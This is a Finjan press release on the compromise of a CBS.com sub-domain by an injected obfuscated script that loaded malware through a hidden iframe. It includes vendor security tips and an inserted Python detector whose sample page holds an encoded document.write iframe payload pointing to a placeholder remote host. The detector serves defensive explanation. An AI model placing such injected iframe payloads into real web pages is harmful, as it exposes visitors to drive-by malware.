Finjan Warns Users Over CBS Portal Being Compromised by Cybercriminals
"The cybercriminals, who compromised one of the sub-domains under CBS.com, appear to have added a malicious obfuscated script to the infected page. The injected script then dynamically injects an IFrame that pulls malware from a remote server locating in Russia." said Yuval Ben-Itzhak, Finjan's CTO.
Fortunately for CBS site visitors, Finjan reports actions were already taken to turn that Russian server offline.
Finjan CTO says the company's MCRC - Malicious Code Research Center - has notified CBS of the problem and the team expects the page in question to be taken offline and/or replaced with the original data.
"This saga confirms our many previous warnings that obfuscated code posing a serious threat to Internet users' PCs. Our Threats Reports have continued to identify the increasing use of code obfuscation as a means of bypassing traditional signature-based solutions in order to propagate malware," he said.
"This saga illustrates the popularity of malicious obfuscated code as a weapon of choice by criminal hackers. It also highlights the fact that no Web portal, no matter how high ranking, can be totally secure against a system hack and consequent infection of its visitors. Web users need to exercise caution at all times," he added.
Finjan's security tips and notes to prevent infection:
1. Install a Secure Web Gateway to protect valuable data from being compromised by malware
2. Finjan is offering free Malware Detection Audits to organisations with over 1,000 users
3. Consider the use of a secure platform when accessing Web 2.0 sites
1. Use Finjan's SecureBrowsing browser plug-in to make the right decisions when browsing the Web (see http://securebrowsing.finjan.com )
2. Exercise caution when accessing Web 2.0-enabled sites, e.g. social networking portals, wikis and blogs
3. Do not rely just on signature-based IT security applications
For all users:
1. The preferred way to stop dynamically obfuscated code and similar types of advanced hacking techniques is to analyse and understand the code embedded within Web content on-the-fly before it reaches the user.
2. Proactive, behaviour-based IT security technology performs in-depth analysis of each and every piece of content, regardless of its original source.
3. This analysis breaks the code into parts, understands the execution path and the functions' call flow.
4. As a result, these solutions can identify code that is about to perform a malicious or suspicious operation, and block it at the perimeter, rather than allowing it to enter the network and relying on desktop security.
5. This type of proactive security is akin to having an 'expert system in a box,' safeguarding users from even the most devious attack techniques, such as those disclosed in this and previous Finjan reports.
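The contrast drawn in the list above, between signature matching and analysing the script itself, shown as an added Python example (not Finjan's code or product logic): it statically resolves one layer of literal `unescape()` / `String.fromCharCode()` calls and flags scripts that write an iframe into the page. The sample page, host name and function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample page: the inline script hides an <iframe> behind unescape().
SAMPLE_PAGE = """<html><body><h1>News</h1>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//remote.example.invalid/x%22%20width%3D0%20height%3D0%3E%3C/iframe%3E'));</script>
</body></html>"""

SIGNATURE = re.compile(r"<iframe[^>]+src=", re.I)  # naive content signature
ESCAPED = re.compile(r"unescape\(\s*(['\"])((?:%[0-9a-fA-F]{2}|[^'\"%\\])*)\1\s*\)")
CHARCODES = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
SINKS = re.compile(r"\b(?:eval|document\.write(?:ln)?)\s*\(|\.innerHTML\s*=")

class ScriptCollector(HTMLParser):
    """Collect the bodies of inline <script> elements."""
    def __init__(self):
        super().__init__()
        self.in_script, self.scripts = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

def decode_layer(js):
    """Statically resolve literal unescape()/fromCharCode() calls (one layer)."""
    js = ESCAPED.sub(lambda m: repr(unquote(m.group(2))), js)
    return CHARCODES.sub(
        lambda m: repr("".join(chr(int(n)) for n in m.group(1).split(","))), js)

def scan(page):
    """Return findings for scripts that write a decoded iframe into the page."""
    collector = ScriptCollector()
    collector.feed(page)
    findings = []
    for js in collector.scripts:
        decoded = decode_layer(js)
        if SIGNATURE.search(decoded) and SINKS.search(js):
            findings.append({"hidden_from_signature": not SIGNATURE.search(js),
                             "decoded": decoded})
    return findings
```

Only literal arguments and a single layer are resolved here; nested or computed obfuscation needs the script to be evaluated in an instrumented sandbox.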
For more on the CBS site infection: http://www.finjan.com/MCRCblog.aspx?EntryId=2103
For more on Finjan: http://www.finjan.com
Malicious Code Research Center (MCRC) is the leading research department at Finjan, dedicated to the research and detection of security vulnerabilities in Internet applications, as well as other popular programs. MCRC's goal is to stay steps ahead of hackers attempting to exploit open platforms and technologies to develop malicious code such as Spyware, Trojans, Phishing attacks, worms and viruses. MCRC shares its research efforts with many of the world's leading software vendors to help patch their security holes. MCRC is a driving force behind the development of next generation security technologies used in Finjan's proactive web security solutions. For more information, visit our MCRC subsite.
Finjan Software GmbH
Finjan is a global provider of web security solutions for the enterprise market. Our real-time, appliance-based web security solutions deliver the most effective shield against web-borne threats, freeing enterprises to harness the web for maximum commercial results. Finjan's active real-time web security solutions utilize patented behaviour-based technology to repel all types of threats arriving via the web, such as spyware, phishing, Trojans and obfuscated malicious code, securing businesses against unknown and emerging threats, as well as known malware. Finjan's security solutions have received industry awards and recognition from leading analyst houses and publications, including Gartner, IDC, Butler Group, SC Magazine, CRN, ITPro, PCPro, ITWeek, Network Computing, and Information Security. With Finjan's award-winning and widely used solutions, businesses can focus on implementing web strategies to realize their full organizational and commercial potential. For more information about Finjan, please visit: www.finjan.com.